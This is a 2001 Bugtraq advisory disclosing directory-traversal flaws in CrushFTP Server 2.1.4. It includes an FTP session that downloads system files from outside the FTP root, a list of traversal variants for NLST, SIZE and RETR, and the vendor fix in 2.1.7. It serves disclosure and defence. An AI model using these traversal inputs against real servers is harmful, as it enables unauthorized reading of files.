Home page logo
/

bugtraq logo Bugtraq mailing list archives

Vulnerabilities in CrushFTP Server
From: joetesta () HUSHMAIL COM
Date: Thu, 3 May 2001 13:13:40 -0800

----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerabilities in CrushFTP Server



    Overview

CrushFTP Server 2.1.4 is a java ftp server available from
http://www.crushftp.com.  Multiple vulnerabilities exist which allow
users to change directories outside of the ftp root and download files.



    Details

The following is an illustration of the problem.  An ftp root of
"c:\directory\directory" was used.

ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK.  Need password.
Password:
230-Welcome!
230 Password OK.  Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.


The vendor issued two versions since I made initial contact to address
additional variations.  The following is a list of vulnerabilities which
affected these intermediate versions (v2.1.5, v2.1.6):

NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat



    Solution

Upgrade to v2.1.7 at:
http://www.crushftp.com



    Vendor Status

The program author, Ben Spink, was contacted via <spinkb () mac com> on
Friday, April 20, 2001.  I would like to thank him for taking this
matter seriously and showing extra effort to resolve these problems.



    - Joe Testa

e-mail:   joetesta () hushmail com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
H4DN+gBMDsfVP0qnC4F8dEdXR7FSneNzs2Now6Thibu+zett3cgrNijdAG77GWmeUrvE
/eoSsg0s6IjBVwrVZXt0CN2XVslnxRwCxpPWAwfVgrQGSGigcRInv/WxWhxA0xEhiffv
Wc3ZnhtPy0toe7N4XKyma58FwlqVRsXKqc5bJgBQquX0wlsnrLkpK3nSVhBBj/NkEkpG
yoyaLAXBNVtfZz+AEdR6iuMZYVdIpsHToi4x5hT6cZNZtjD+MWT8vFT3SsAi0NQ6PqpI
0p6HB8uNJ3ra/oExJleegIDWkJMN/AoIhjuxlrCJxt2yu0CHVeUt+7c353Nv38C8QQvm
bkkLdHMxMj6VvY99mnhyuBcXuJrGigPIguZAp6GER1uARXrv4w0RJ0QIeuB5JI4LXwBb
sIFfCcy/boBIg3QNOPP/eoxGTQ7XCpPBcfXUHrPtk/Xd06XJ/9XhBC+fLzGgHMEE37hH
wbPXMDaJ6OvogRLDVunx+UVJiqjybft960vFm2lgXd75
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com

  By Date           By Thread  

Current thread:
  • Vulnerabilities in CrushFTP Server joetesta (May 04)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault